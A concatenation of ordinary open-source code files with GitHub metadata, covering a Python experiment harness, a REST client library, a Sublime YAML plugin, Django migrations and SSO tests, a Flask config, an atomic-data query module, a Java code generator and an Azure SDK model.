            (cfgiter.parent_index * cfgiter.length) + cfgx,
cfgiter.length * cfgiter.parent_length
)
with ut.Indenter(indent_prefix):
# Run the test / read cache
_need_compute = True
if use_cache:
# smaller cache for individual configuration runs
st_cfgstr = qreq_.get_cfgstr(with_input=True)
st_cachedir = ut.unixjoin(bt_cachedir, 'small_tests')
st_cachename = 'smalltest'
ut.ensuredir(st_cachedir)
try:
cmsinfo = ut.load_cache(st_cachedir, st_cachename,
st_cfgstr)
except IOError:
_need_compute = True
else:
_need_compute = False
if _need_compute:
assert not ibs.table_cache
if ibs.table_cache:
                    if (prev_feat_cfgstr is not None and
                            prev_feat_cfgstr != qreq_.qparams.feat_cfgstr):
# Clear features to preserve memory
ibs.clear_table_cache()
#qreq_.ibs.print_cachestats_str()
cm_list = qreq_.execute()
cmsinfo = test_result.build_cmsinfo(cm_list, qreq_)
# record previous feature configuration
if ibs.table_cache:
prev_feat_cfgstr = qreq_.qparams.feat_cfgstr
if use_cache:
ut.save_cache(st_cachedir, st_cachename, st_cfgstr,
cmsinfo)
if not NOMEMORY:
# Store the results
cfgx2_cmsinfo.append(cmsinfo)
else:
cfgx2_qreq_[cfgx] = None
if ut.NOT_QUIET:
ut.colorprint('[harn] Completed running test configurations', 'white')
if DRY_RUN:
        print('ran tests in dryrun mode.')
return
if NOMEMORY:
        print('ran tests in memory savings mode. Cannot print; exiting.')
return
# Store all pipeline config results in a test result object
testres = test_result.TestResult(pipecfg_list, cfgx2_lbl, cfgx2_cmsinfo,
cfgx2_qreq_)
testres.testnameid = testnameid
testres.lbl = lbl
testres.cfgdict_list = cfgdict_list
testres.aidcfg = None
if use_cache:
try:
ut.save_cache(bt_cachedir, bt_cachename, bt_cachestr, testres)
except Exception as ex:
ut.printex(ex, 'error saving testres cache', iswarning=True)
if ut.SUPER_STRICT:
raise
return testres
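# Editor's note (hedged summary, not part of the original source): when use_cache is
# enabled, make_single_testres() above consults two cache layers:
#   * a bulk cache (BULK_TEST_CACHE2 / 'BULKTESTCACHE2_v2') keyed on the combined
#     cfgstrs of every query request, which can short-circuit the whole call, and
#   * a per-configuration 'small_tests' cache keyed on each qreq_'s cfgstr, which
#     skips execution of just that pipeline configuration.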
if __name__ == '__main__':
"""
CommandLine:
python -m ibeis.expt.harness
python -m ibeis.expt.harness --allexamples
"""
import multiprocessing
multiprocessing.freeze_support() # for win32
import utool as ut # NOQA
ut.doctest_funcs()
|
{
"content_hash": "cb517c56f14c669247b3d703cd2f411e",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 87,
"avg_line_length": 38.07835820895522,
"alnum_prop": 0.5550220480156786,
"repo_name": "Erotemic/ibeis",
"id": "348ee13a3c96a541a8f647089472e37fd2dfff2d",
"size": "10229",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "ibeis/expt/harness.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "331"
},
{
"name": "CSS",
"bytes": "4676"
},
{
"name": "Dockerfile",
"bytes": "13018"
},
{
"name": "Inno Setup",
"bytes": "1585"
},
{
"name": "Python",
"bytes": "6661573"
},
{
"name": "Shell",
"bytes": "56171"
}
],
"symlink_target": ""
}
|
import requests
from six import with_metaclass, iteritems
from future.utils import python_2_unicode_compatible
from datetime import datetime
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
from .fields import Field
from .paginators import DummyPaginator
from .exceptions import NotFoundException
class APIConnected(object):
"""
    This class handles API endpoints and interfaces with the authorization client to actually send requests
"""
class Meta:
"""
This class hosts all the configuration parameters of the main class
:param collection_endpoint: Relative path to the collection, /-terminated
        :param parse_json: Must be True if response data comes as a JSON string in the body of the response, False otherwise
"""
collection_endpoint = None
parse_json = True
def __init__(self, auth_client):
"""
Initializes the instance
:param auth_client: Client to make (non)authorized requests
:return:
"""
self.client = auth_client
@classmethod
def get_resource_endpoint(cls, resource_id):
"""
Get the relative path to a specific API resource
:param cls: Resource class
:param resource_id: Resource id
:return: Relative path to the resource
"""
return urljoin(cls.get_collection_endpoint(), str(resource_id) + "/") if resource_id is not None else None
@classmethod
def get_collection_endpoint(cls):
"""
Get the relative path to the API resource collection
        If Meta.collection_endpoint is not set, it defaults to the lowercase name of the resource class plus an "s" and a terminating "/"
:param cls: Resource class
:return: Relative path to the resource collection
"""
if cls.Meta.collection_endpoint is not None:
if cls.Meta.collection_endpoint.endswith("/"):
return cls.Meta.collection_endpoint
else:
return cls.Meta.collection_endpoint + "/"
else:
return cls.__name__.lower() + "s/"
def send(self, url, http_method, **client_args):
"""
Make the actual request to the API
:param url: URL
:param http_method: The method used to make the request to the API
:param client_args: Arguments to be sent to the auth client
:return: requests' response object
"""
return self.client.send(url, http_method, **client_args)
class ResourceMetaclass(type):
"""
Handle all the work that needs to be done on class initialization to deal with fields
"""
def __init__(cls, name, bases, nmspc):
"""
Manage Meta inheritance and create the self.fields list of field attributes
:param cls: Class object
:param name: Class name
:param bases: Class inheritance
:param nmspc: Class namespace
:return:
"""
super(ResourceMetaclass, cls).__init__(name, bases, nmspc)
for klass in bases:
if hasattr(klass, "Meta"):
for attribute_name, attribute in iteritems(klass.Meta.__dict__):
if not (attribute_name.startswith("__") or hasattr(cls.Meta, attribute_name)):
setattr(cls.Meta, attribute_name, attribute)
cls.fields = []
for attribute_name, attribute in iteritems(cls.__dict__):
if isinstance(attribute, Field):
attribute.name = attribute_name
cls.fields.append(attribute_name)
@python_2_unicode_compatible
class Resource(with_metaclass(ResourceMetaclass, APIConnected)):
"""
Resource on the REST API
API attributes are expected to be defined as attributes on the class by using fields. Configuration parameters go in the Meta class
"""
class Meta:
"""
This class hosts all the configuration parameters of the main class
        :param id_field: Name of the field that acts as the unique API identifier for the resource
:param name_field: Name of the field whose value can be used as a friendly representation of the resource
:param json_data: Whether the API expects data to be sent as json or not
"""
id_field = "id"
name_field = "id"
json_data = True
def __init__(self, auth_client, **kwargs):
"""
Initializes the resource
:param auth_client: Client to make (non)authorized requests
:param kwargs: Initial value for attributes
:return:
"""
for name, value in iteritems(kwargs):
setattr(self, name, value)
super(Resource, self).__init__(auth_client)
def __str__(self):
"""
Give a nice representation for the resource
        :return: Resource-friendly representation based on the self.Meta.name_field attribute
"""
return getattr(self, self.Meta.name_field, super(Resource, self).__str__())
def get_id(self):
return getattr(self, self.Meta.id_field, None)
def get_resource_endpoint(self):
"""
Get the relative path to the specific API resource
:return: Relative path to the resource
"""
return super(Resource, self).get_resource_endpoint(self.get_id())
def update_from_dict(self, attribute_dict):
"""
        Update the fields of the resource from a data dictionary taken from an API response
:param attribute_dict: Dictionary to be mapped into object attributes
:return:
"""
for field_name, field_value in iteritems(attribute_dict):
if self.fields is None or field_name in self.fields:
setattr(self, field_name, field_value)
def send(self, url, http_method, **client_args):
"""
Make the actual request to the API, updating the resource if necessary
:param url: Endpoint URL
:param http_method: The method used to make the request to the API
:param client_args: Arguments to be sent to the auth client
:return:
"""
response = super(Resource, self).send(url, http_method, **client_args)
response_data = self.client.get_response_data(response, self.Meta.parse_json)
# Update Python object if we get back a full object from the API
try:
if response_data:
self.update_from_dict(response_data)
except ValueError:
pass
return response if response is not None else None
def save(self, force_create=False, fields=None):
"""
Saves (creates or updates) resource on the server
:param force_create: If True, forces resource creation even if it already has an Id.
:param fields: List of fields to be saved. If None, all fields will be saved.
:return:
"""
values = {}
fields = fields or self.fields
for field_name in fields:
value = getattr(self, field_name)
# When creating or updating, only references to other resources are sent, instead of the whole resource
if isinstance(value, Resource):
if value._expand is False:
value = value.get_id()
else:
value = {"id": value.get_id()}
if isinstance(value, list):
# Lists of resources are not sent when creating or updating a resource
if len(value) > 0 and isinstance(value[0], Resource):
value = None
else:
# We need to check for datetimes in the list
final_value_list = []
for item in value:
final_value_list.append(item.isoformat() if isinstance(item, datetime) else item)
value = final_value_list
if isinstance(value, datetime):
# TODO: Allow for different formats
value = value.isoformat()
if value is not None:
values[field_name] = value
http_headers = {'content-type': 'application/json'} if self.Meta.json_data is True else None
json = values if self.Meta.json_data is True else None
data = values if self.Meta.json_data is False else None
if self.get_resource_endpoint() is not None and force_create is False:
return self.send(self.get_resource_endpoint(), "put", headers=http_headers, json=json, data=data)
else:
return self.send(self.get_collection_endpoint(), "post", headers=http_headers, json=json, data=data)
def refresh(self):
"""
Refreshes a resource by checking against the API
:return:
"""
if self.get_resource_endpoint() is not None:
return self.send(self.get_resource_endpoint(), "get")
def delete(self):
"""
Deletes the resource from the server; Python object remains untouched
:return:
"""
if self.get_resource_endpoint() is not None:
return self.send(self.get_resource_endpoint(), http_method="delete")
class Manager(APIConnected):
"""
Manager class for resources
:param resource_class: Resource class
:param json_collection_attribute: Which attribute of the response json hosts the list of resources when retrieving the resource collection
:param paginator_class: Which paginator class to use when retrieving the resource collection
"""
resource_class = None
json_collection_attribute = "data"
paginator_class = DummyPaginator
def __init__(self, auth_client):
"""
:param auth_client: Client to make (non)authorized requests
:return:
"""
self.paginator = self.paginator_class(auth_client.base_url)
super(Manager, self).__init__(auth_client)
@classmethod
def get_collection_endpoint(cls):
"""
Get the relative path to the API resource collection, using the corresponding resource class
:param cls: Manager class
:return: Relative path to the resource collection
"""
return cls.resource_class.get_collection_endpoint()
def get(self, resource_id):
"""
Get one single resource from the API
:param resource_id: Id of the resource to be retrieved
:return: Retrieved resource
"""
response = self.send(self.get_resource_endpoint(resource_id), "get")
try:
resource = self.resource_class(self.client)
except (ValueError, TypeError):
return None
else:
response_data = self.client.get_response_data(response, self.Meta.parse_json)
if response_data:
resource.update_from_dict(response_data)
return resource
def get_or_none(self, resource_id):
"""
        Get one single resource from the API, returning None if it is not found instead of raising an exception
:param resource_id: Id of the resource to be retrieved
:return: Retrieved resource
"""
try:
return self.get(resource_id)
except NotFoundException:
return None
def filter(self, **search_args):
"""
Get a filtered list of resources
:param search_args: To be translated into ?arg1=value1&arg2=value2...
:return: A list of resources
"""
search_args = search_args or {}
raw_resources = []
for url, paginator_params in self.paginator.get_urls(self.get_collection_endpoint()):
search_args.update(paginator_params)
response = self.paginator.process_response(self.send(url, "get", params=search_args))
raw_resources += self.client.get_response_data(response, self.Meta.parse_json)[self.json_collection_attribute] if self.json_collection_attribute is not None else self.client.get_response_data(response, self.Meta.parse_json)
resources = []
for raw_resource in raw_resources:
try:
resource = self.resource_class(self.client)
except (ValueError, TypeError):
continue
else:
resource.update_from_dict(raw_resource)
resources.append(resource)
return resources
def all(self):
"""
Get a list of all the resources
:return: A list of resources
"""
return self.filter()
def create(self, **kwargs):
"""
Create a resource on the server
        :param kwargs: Attributes (field names and values) of the new resource
"""
resource = self.resource_class(self.client)
resource.update_from_dict(kwargs)
resource.save(force_create=True)
return resource
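# Hedged usage sketch (editor's addition; the Book/BookManager classes and the
# auth_client below are hypothetical, and it is assumed that Field() can be
# instantiated with no arguments):
#
#   class Book(Resource):
#       title = Field()
#       pages = Field()
#
#       class Meta:
#           collection_endpoint = "books/"
#           name_field = "title"
#
#   class BookManager(Manager):
#       resource_class = Book
#
#   books = BookManager(auth_client)   # auth_client must provide send()/get_response_data()
#   new_book = books.create(title="Dune", pages=412)
#   all_books = books.all()
#   dune = books.get_or_none(new_book.get_id())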
|
{
"content_hash": "4ed7770b4230cf8075e0671b1e2167f2",
"timestamp": "",
"source": "github",
"line_count": 344,
"max_line_length": 235,
"avg_line_length": 37.50581395348837,
"alnum_prop": 0.6164935668888545,
"repo_name": "danicarrion/pyrestcli",
"id": "40f43d332b6262d85a95912894639167404819a3",
"size": "12902",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyrestcli/resources.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "38706"
}
],
"symlink_target": ""
}
|
import sublime
import sublime_plugin
import decimal
try:
from . import yaml
except (ImportError, ValueError):
import yaml
s = sublime.load_settings("Pretty YAML.sublime-settings")
class PrettyyamlCommand(sublime_plugin.TextCommand):
def run(self, edit):
""" Pretty print YAML """
regions = self.view.sel()
for region in regions:
selected_entire_file = False
if region.empty() and len(regions) > 1:
continue
elif region.empty() and s.get("use_entire_file_if_no_selection", True):
selection = sublime.Region(0, self.view.size())
selected_entire_file = True
else:
selection = region
try:
obj = yaml.load(self.view.substr(selection))
self.view.replace(edit, selection, yaml.dump(obj, **s.get("dumper_args")))
if selected_entire_file:
self.change_syntax()
except Exception:
import sys
exc = sys.exc_info()[1]
sublime.status_message(str(exc))
def change_syntax(self):
if "Plain text" in self.view.settings().get('syntax'):
self.view.set_syntax_file("Packages/YAML/YAML.tmLanguage")
def plugin_loaded():
global s
s = sublime.load_settings("Pretty YAML.sublime-settings")
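# Hedged example (editor's addition, not part of the plugin): the "dumper_args"
# setting read above is unpacked straight into yaml.dump, so a
# "Pretty YAML.sublime-settings" file might look like:
#
#   {
#       "use_entire_file_if_no_selection": true,
#       "dumper_args": {"default_flow_style": false, "indent": 2}
#   }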
|
{
"content_hash": "2b3e0b500b9dc21fbb0e2c6d02b16409",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 90,
"avg_line_length": 30.47826086956522,
"alnum_prop": 0.572039942938659,
"repo_name": "aukaost/SublimePrettyYAML",
"id": "56a0c9a385cbd61ff49b28cd6e802010cf47ca93",
"size": "1402",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "PrettyYaml.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "426340"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('finaid', '0012_updates_to_finaidreviewdata'),
]
operations = [
migrations.AddField(
model_name='financialaidapplication',
name='application_type',
field=models.CharField(default=b'general', help_text='Application Classification', max_length=64, verbose_name='Application Type', choices=[(b'general', 'General Applicant'), (b'staff', 'PyCon Staff/Volunteer'), (b'speaker', 'Speaker'), (b'core_dev', 'Python Core Developer'), (b'psf_board', 'PSF Board Member'), (b'outstanding_community_member', 'Outstanding Community Member')]),
),
]
|
{
"content_hash": "7d1b3a869cb32bfd24740086216c9e22",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 393,
"avg_line_length": 41.888888888888886,
"alnum_prop": 0.6671087533156499,
"repo_name": "PyCon/pycon",
"id": "8414c6c0df7f68960775a396767aab8f5f0d999d",
"size": "778",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pycon/finaid/migrations/0013_financialaidapplication_application_type.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "80909"
},
{
"name": "Dockerfile",
"bytes": "163"
},
{
"name": "HTML",
"bytes": "313093"
},
{
"name": "JavaScript",
"bytes": "161207"
},
{
"name": "Makefile",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "993540"
},
{
"name": "Shell",
"bytes": "14094"
},
{
"name": "Smarty",
"bytes": "7379"
}
],
"symlink_target": ""
}
|
"""
Query database to create an atom
"""
import unicodedata
import numpy as np
from operator import itemgetter
from mypython.database.element import Element
from mypython.database.table.shared_tool import cursor
from mypython.database.table.shared_tool import safe_fetchone
def merge(list_input,order):
list_tmp=[]
for i in range(len(list_input)):
for j in range(len(order)):
if(list_input[i][5]==order[j]):
list_input[i][5]=j
list_tmp.append(list_input[i])
break
list_tmp.sort(key = lambda row: (row[1],row[2],row[3],row[4],row[5]))
list_output=[]
key=[]
for i in range(len(list_tmp)):
key2 = [list_tmp[i][1],list_tmp[i][2],list_tmp[i][3],list_tmp[i][4]]
if(key != key2):
key = key2
list_output.append(list_tmp[i])
return list_output
def atom(name,isotope=-1,charge=0,method=["nist","divers","cipsi"],method_dip=None,spinorbit=False):
if(isinstance(method,str)): method=[method]
    method = [unicodedata.normalize("NFKD", val.casefold()) for val in method]
if(method_dip==None):method_dip=method
else:
if(isinstance(method_dip,str)): method_dip=[method_dip]
        method_dip = [unicodedata.normalize("NFKD", val.casefold()) for val in method_dip]
cursor.execute("""SELECT number,fullname,electrons_valence
FROM general WHERE label = ?""",(name,))
(number,fullname,ele_val) = safe_fetchone(3,"general")
# default : take the most abundant isotope
if(isotope<0):
cursor.execute("""SELECT abundance,isotope FROM isotope
WHERE label = ?""",(name,))
list_isotope = cursor.fetchall()
abund=0.
isotope=None
for val in list_isotope:
if(val[0]==None):
continue
if(val[0]>abund):
abund=val[0]
isotope=val[1]
cursor.execute("""SELECT mass,spin,mag_moment FROM isotope WHERE label = ?
and isotope = ?""",(name,isotope))
(mass,nuclear_spin,mag_moment) = safe_fetchone(3,"isotope")
    nuclear_spin=nuclear_spin/2. # the database stores 2 * S as an integer
cursor.execute("""SELECT energy,configuration
,totalSpin,totalOrbital,totalJ
,method FROM energy
WHERE label = ?
and charge = ?""",(name,charge))
list_ener=cursor.fetchall()
if(len(list_ener)==0):
energy=[]
configuration=[]
dipole=[]
energy_method=[]
lifetime=[]
else:
# select JJ or LS representation
list_energy=[]
for row in list_ener:
if(spinorbit):
if(row[4] >= 0.):
list_energy.append(list(row))
else:
if(row[4] < 0.):
list_energy.append(list(row))
# select method and delete less accurate entry
list_energy=merge(list_energy,method)
list_energy.sort(key=itemgetter(0))
energy=[]
lifetime=[]
configuration=[]
energy_method=[]
for val in list_energy:
energy.append(val[0])
configuration.append((val[1],val[2]/2.,val[3]/2.,val[4]/2.))
energy_method.append(method[val[5]])
nener=len(list_energy)
dipole=np.zeros([nener,nener])
for i in range(nener):
for j in range(i,nener):
for val in method_dip:
cursor.execute("""SELECT
dipole
FROM dipole
WHERE label = ?
and charge = ?
and method = ?
and configuration = ?
and totalSpin = ?
and totalOrbital = ?
and totalJ = ?
and exc_configuration = ?
and exc_totalSpin = ?
and exc_totalOrbital = ?
and exc_totalJ = ?
""",(name,charge,val
,list_energy[i][1],list_energy[i][2]
,list_energy[i][3],list_energy[i][4]
,list_energy[j][1],list_energy[j][2]
,list_energy[j][3],list_energy[j][4]))
dip = safe_fetchone(1,"dipole")[0]
if (dip != None):
dipole[i,j] = dip
break
dipole[j,i]=dipole[i,j]
# look at lifetime of each levels
cursor.execute("""SELECT
lifetime
FROM lifetime
WHERE label = ?
and charge = ?
and configuration = ?
and totalSpin = ?
and totalOrbital = ?
and totalJ = ?
""",(name,charge
,list_energy[i][1],list_energy[i][2]/2
,list_energy[i][3]/2,list_energy[i][4]/2))
life = safe_fetchone(1,"lifetime")[0]
if (life == None): life=-1.
lifetime.append(life)
ele=Element(number,name,fullname,mass,charge,ele_val,nuclear_spin,mag_moment
,configuration,energy,energy_method,dipole,lifetime)
return ele
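# Hedged usage sketch (editor's addition; assumes an "Rb" entry exists in the database):
#
#   rb = atom("Rb", charge=0, method=["nist"], spinorbit=False)
#   # the returned Element bundles the atomic number, mass, nuclear spin, the selected
#   # energy levels and configurations, the dipole matrix and the level lifetimes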
|
{
"content_hash": "794d50c7ee99edb0258de3edab3c2694",
"timestamp": "",
"source": "github",
"line_count": 153,
"max_line_length": 100,
"avg_line_length": 35.77777777777778,
"alnum_prop": 0.49159663865546216,
"repo_name": "rvexiau/mypython",
"id": "40aebfef8dfc6814c803a4e0da22416cc2cd3824",
"size": "5521",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mypython/database/create_atom.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "509161"
}
],
"symlink_target": ""
}
|
import os
import sys
from raygun4py.middleware import flask as flask_raygun
PYTHON_VERSION = sys.version_info[0]
if PYTHON_VERSION == 3:
import urllib.parse
else:
import urlparse
basedir = os.path.abspath(os.path.dirname(__file__))
if os.path.exists('config.env'):
    print('Importing environment from config.env file')
for line in open('config.env'):
var = line.strip().split('=')
if len(var) == 2:
os.environ[var[0]] = var[1]
class Config:
APP_NAME = 'Legal-Checkup'
if os.environ.get('SECRET_KEY'):
SECRET_KEY = os.environ.get('SECRET_KEY')
else:
SECRET_KEY = 'SECRET_KEY_ENV_VAR_NOT_SET'
print('SECRET KEY ENV VAR NOT SET! SHOULD NOT SEE IN PRODUCTION')
SQLALCHEMY_COMMIT_ON_TEARDOWN = True
MAIL_SERVER = 'smtp.sendgrid.net'
MAIL_PORT = 587
MAIL_USE_TLS = True
MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD') or 'password'
ADMIN_EMAIL = os.environ.get(
'ADMIN_EMAIL') or 'flask-base-admin@example.com'
EMAIL_SUBJECT_PREFIX = '[{}]'.format(APP_NAME)
EMAIL_SENDER = '{app_name} Admin <{email}>'.format(
app_name=APP_NAME, email=MAIL_USERNAME)
REDIS_URL = os.getenv('REDISTOGO_URL') or 'http://localhost:6379'
RAYGUN_APIKEY = os.environ.get('RAYGUN_APIKEY')
# Parse the REDIS_URL to set RQ config variables
if PYTHON_VERSION == 3:
urllib.parse.uses_netloc.append('redis')
url = urllib.parse.urlparse(REDIS_URL)
else:
urlparse.uses_netloc.append('redis')
url = urlparse.urlparse(REDIS_URL)
RQ_DEFAULT_HOST = url.hostname
RQ_DEFAULT_PORT = url.port
RQ_DEFAULT_PASSWORD = url.password
RQ_DEFAULT_DB = 0
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
ASSETS_DEBUG = True
SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite')
print('THIS APP IS IN DEBUG MODE. YOU SHOULD NOT SEE THIS IN PRODUCTION.')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-test.sqlite')
WTF_CSRF_ENABLED = False
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data.sqlite')
SSL_DISABLE = (os.environ.get('SSL_DISABLE') or 'True') == 'True'
@classmethod
def init_app(cls, app):
Config.init_app(app)
assert os.environ.get('SECRET_KEY'), 'SECRET_KEY IS NOT SET!'
flask_raygun.Provider(app, app.config['RAYGUN_APIKEY']).attach()
class HerokuConfig(ProductionConfig):
@classmethod
def init_app(cls, app):
ProductionConfig.init_app(app)
# Handle proxy server headers
from werkzeug.contrib.fixers import ProxyFix
app.wsgi_app = ProxyFix(app.wsgi_app)
class UnixConfig(ProductionConfig):
@classmethod
def init_app(cls, app):
ProductionConfig.init_app(app)
# Log to syslog
import logging
from logging.handlers import SysLogHandler
syslog_handler = SysLogHandler()
syslog_handler.setLevel(logging.WARNING)
app.logger.addHandler(syslog_handler)
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'production': ProductionConfig,
'default': DevelopmentConfig,
'heroku': HerokuConfig,
'unix': UnixConfig
}
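# Hedged usage sketch (editor's addition; the app factory context below is hypothetical):
#
#   config_name = os.getenv('FLASK_CONFIG') or 'default'
#   app.config.from_object(config[config_name])
#   config[config_name].init_app(app)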
|
{
"content_hash": "7d0a50be198e4a822788117fa6a92426",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 78,
"avg_line_length": 29.5609756097561,
"alnum_prop": 0.650990099009901,
"repo_name": "hack4impact/legal-checkup",
"id": "991b6ed3172becb334fb79c8fe22b4043dee6bd6",
"size": "3636",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "5757"
},
{
"name": "HTML",
"bytes": "48084"
},
{
"name": "JavaScript",
"bytes": "9422"
},
{
"name": "Python",
"bytes": "59640"
}
],
"symlink_target": ""
}
|
try:
from django.contrib.auth import get_user_model
except ImportError: # django < 1.5
from django.contrib.auth.models import User
else:
User = get_user_model()
from django.utils import unittest
from openid.consumer.consumer import SuccessResponse
from openid.consumer.discover import OpenIDServiceEndpoint
from openid.message import Message, OPENID2_NS
from admin_sso import settings
from admin_sso.auth import DjangoSSOAuthBackend
from admin_sso.models import Assignment
from . import skipIfOpenID, skipIfOAuth
SREG_NS = "http://openid.net/sreg/1.0"
class AuthModuleTests(unittest.TestCase):
def setUp(self):
self.auth_module = DjangoSSOAuthBackend()
self.user = User.objects.create(username='admin_sso1')
self.assignment1 = Assignment.objects.create(username='',
username_mode=settings.ASSIGNMENT_ANY,
domain='example.com',
user=self.user,
weight=100)
def tearDown(self):
self.user.delete()
Assignment.objects.all().delete()
def test_empty_authenticate(self):
user = self.auth_module.authenticate()
self.assertEqual(user, None)
@skipIfOpenID
def test_simple_assignment(self):
email = "foo@example.com"
user = self.auth_module.authenticate(sso_email=email)
self.assertEqual(user, self.user)
def create_sreg_response(self, fullname='', email='', identifier=''):
message = Message(OPENID2_NS)
message.setArg(SREG_NS, "fullname", fullname)
message.setArg(SREG_NS, "email", email)
endpoint = OpenIDServiceEndpoint()
endpoint.display_identifier = identifier
return SuccessResponse(endpoint, message, signed_fields=message.toPostArgs().keys())
@skipIfOAuth
def test_domain_matches(self):
response = self.create_sreg_response(fullname="User Name", email="foo@example.com", identifier='7324')
user = self.auth_module.authenticate(openid_response=response)
self.assertEqual(user, self.user)
def test_get_user(self):
user = self.auth_module.get_user(self.user.id)
self.assertEqual(user, self.user)
user = self.auth_module.get_user(self.user.id + 42)
self.assertEqual(user, None)
class AssignmentManagerTests(unittest.TestCase):
def setUp(self):
self.user = User.objects.create(username='admin_sso1')
self.assignment1 = Assignment.objects.create(username='',
username_mode=settings.ASSIGNMENT_ANY,
domain='example.com',
user=self.user,
weight=100)
self.assignment2 = Assignment.objects.create(username='*bar',
username_mode=settings.ASSIGNMENT_MATCH,
domain='example.com',
user=self.user,
weight=200)
self.assignment3 = Assignment.objects.create(username='foo*',
username_mode=settings.ASSIGNMENT_EXCEPT,
domain='example.com',
user=self.user,
weight=300)
def tearDown(self):
self.user.delete()
Assignment.objects.all().delete()
def test_domain_matches(self):
email = "foo@example.com"
user = Assignment.objects.for_email(email)
self.assertEqual(user, self.assignment1)
def test_invalid_domain(self):
email = 'someone@someotherdomain.com'
user = Assignment.objects.for_email(email)
self.assertIsNone(user)
def test_domain_matches_and_username_ends_with_bar(self):
email = "foobar@example.com"
user = Assignment.objects.for_email(email)
self.assertEqual(user, self.assignment2)
def test_domain_matches_and_username_doesnt_begin_with_foo(self):
email = "bar@example.com"
user = Assignment.objects.for_email(email)
self.assertEqual(user, self.assignment3)
def test_invalid_email(self):
email = 'invalid'
user = Assignment.objects.for_email(email)
self.assertEqual(user, None)
def test_change_weight(self):
self.assignment2.weight = 50
self.assignment2.save()
email = "foobar@example.com"
user = Assignment.objects.for_email(email)
self.assertEqual(user, self.assignment1)
|
{
"content_hash": "bf0134a5c43d40c42528cb8e82f938c9",
"timestamp": "",
"source": "github",
"line_count": 121,
"max_line_length": 110,
"avg_line_length": 40.51239669421488,
"alnum_prop": 0.5720114239086087,
"repo_name": "allink/django-admin-sso",
"id": "5d3c978c19198bf8f7e5d61cdec362c560e6e039",
"size": "4902",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "admin_sso/tests/test_auth.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "402"
},
{
"name": "Python",
"bytes": "37960"
}
],
"symlink_target": ""
}
|
from common import startfile, SIZES, classname, cells
if __name__ == '__main__':
fd = startfile("functions", "Identity")
def line(s=""):
print >> fd, s
for rows in SIZES:
line("import org.dnikulin.jula.fixed.%s;" % classname(rows, rows))
line()
line("public final class Identity {")
for rows in SIZES:
line(" public static void setIdentity(final %s a) {" % classname(rows, rows))
for (row, col, label) in cells(rows, rows):
value = (1 if (row == col) else 0)
line(" a.%s = %d;" % (label, value))
line(" }")
line()
line(" private Identity() {}")
line("}")
fd.flush()
fd.close()
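# Hedged illustration (editor's addition; the exact class and cell names depend on the
# classname()/cells() helpers imported from common, which are not shown here): for
# rows == 2 the script is expected to emit a Java method roughly of the form
#
#   public static void setIdentity(final <Matrix2x2Class> a) {
#       a.<cell00> = 1;
#       a.<cell01> = 0;
#       a.<cell10> = 0;
#       a.<cell11> = 1;
#   }
#
# i.e. ones on the diagonal and zeros elsewhere, one overload per size in SIZES.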
|
{
"content_hash": "9e992e9ad7cb20f4abc51ba01959b952",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 88,
"avg_line_length": 27.346153846153847,
"alnum_prop": 0.5218002812939522,
"repo_name": "dnikulin/jula",
"id": "3489b55b63a1e90ddd4fda88e38158d7185e3e52",
"size": "1294",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/make_identity.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Java",
"bytes": "5689"
},
{
"name": "Python",
"bytes": "17121"
},
{
"name": "Shell",
"bytes": "324"
}
],
"symlink_target": ""
}
|
from msrest.serialization import Model
class Resource(Model):
"""The Resource definition for other than namespace.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Resource Id
:vartype id: str
:ivar name: Resource name
:vartype name: str
:ivar type: Resource type
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self):
self.id = None
self.name = None
self.type = None
|
{
"content_hash": "57a53eb0e369ed97f7aa503fa04c705e",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 72,
"avg_line_length": 23.666666666666668,
"alnum_prop": 0.5428937259923176,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "3ceb6eac8a771bad0c4f3517df2de5dd65b266bd",
"size": "1255",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
